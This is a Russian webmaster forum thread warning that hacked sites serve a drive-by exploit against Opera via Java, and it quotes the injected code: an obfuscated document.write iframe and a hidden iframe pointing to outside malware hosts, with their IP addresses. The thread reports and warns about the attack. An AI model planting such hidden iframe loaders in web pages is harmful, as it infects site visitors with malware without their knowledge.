Вирусняк

KY
На сайте с 19.06.2007
Offline
43
1084

Будьте осторожней. Сегодня уже на втором сайте пробилась опера эксплоитом.

Первый сайт - был ГС из какой-то темы в партнёрках (titrov.net)

Второй - drom.ru - что удивило. Судя по всему, хакнули их.. Как я понял, уязвимость пришла через java-апплет. Я пока себе отключил джаву (не javascript): настройки -> дополнительно -> содержимое -> включить java - убираем галку.

Повторюсь, будьте предельно аккуратны при просмотре. Не знаю, какие браузеры пробиваются, меня спас контроль запуска важных системных объектов.

Явно левый код на дроме:

<script type="text/javascript"><!--

document.write('<if'+'ra'+'me sr'+'c="http://alexarank.in/in.cgi?6" ST'+'YLE="width:'+'0pt;hei'+'ght:0pt;"></'+'if'+'ra'+'me>')//--></script>

на титрах:

<iframe src="http://google-analyzer.com/in.cgi?stats" width="3" height="2" style="visibility: hidden;"></iframe>

айпихи этих двух доменов 91.213.174.13 и 91.213.174.50 - явно один человек работает.

ps. раньше хакали из удовольствия, альтруизма и удовлетворения своего эго. Сейчас - чтобы заработать. Прогресс........

nothing personal. just business
hor70
На сайте с 07.04.2009
Offline
43
#1

Зашел на drom.ru с включенной java, в чем суть вируса ?

Fat Bear
На сайте с 01.12.2006
Offline
264
#2
hor70:
Зашел на drom.ru с включенной java, в чем суть вируса ?

В совсем "маленькой" мелочи

jpg test.jpg
Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
hor70
На сайте с 07.04.2009
Offline
43
#3

Меня ни какое окно не предупреждало :)

Чего я теперь должен опасаться ?

Деньги из WM уведут ? :)

hor70
На сайте с 07.04.2009
Offline
43
#4

............................................

KY
На сайте с 19.06.2007
Offline
43
#5
Зашел на drom.ru с включенной java, в чем суть вируса ?

ммм.... говорю ж, не стОит !

видишь квадратик под менюхой, справа от логотипа - енто ифрейм и есть. Опера + включенная жава. Говорил же...

hor70:
Деньги из WM уведут ? :)

как в воду.... оказывается не совсем я спасся... подпортили мне вебмани - не запускался клиент (процесс жрал 50%, но ничего не запускалось). Помогло только полное удаление + удаление какой-то длл'ки явно лишней в папке с вебманями + установка заново. Деньги вроде на месте, тьфу-тьфу-тьфу.

hor70
На сайте с 07.04.2009
Offline
43
#6
KaYSer:
ммм.... говорю ж, не стОит !
видишь квадратик под менюхой, справа от логотипа - енто ифрейм и есть. Опера + включенная жава. Говорил же...

ничего страшного, мы не боимся :)

квадратик вижу ;)

лучше подскажи сайты где можно подцепить "вирус-вымогатель" (баннер), давно ищу, хочу посмотреть на это чудо :D

Mad_Man
На сайте с 10.11.2008
Offline
162
#7

hor70, качайте целые сборники вирусов за 2008-2009 года. Не ошибётесь.

Для ТС: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=alexarank.in/

KY
На сайте с 19.06.2007
Offline
43
#8
Mad_Man:
hor70, качайте целые сборники вирусов за 2008-2009 года. Не ошибётесь.


Для ТС: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=alexarank.in/

это понятно. Новость была в том, что вирусняк этот пробивает оперу с джавой со всеми последними обновлениями.

hor70
На сайте с 07.04.2009
Offline
43
#9
KaYSer:
Новость была в том, что вирусняк этот пробивает оперу с джавой со всеми последними обновлениями.

Значит не всякую Оперу с java пробивает ;)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий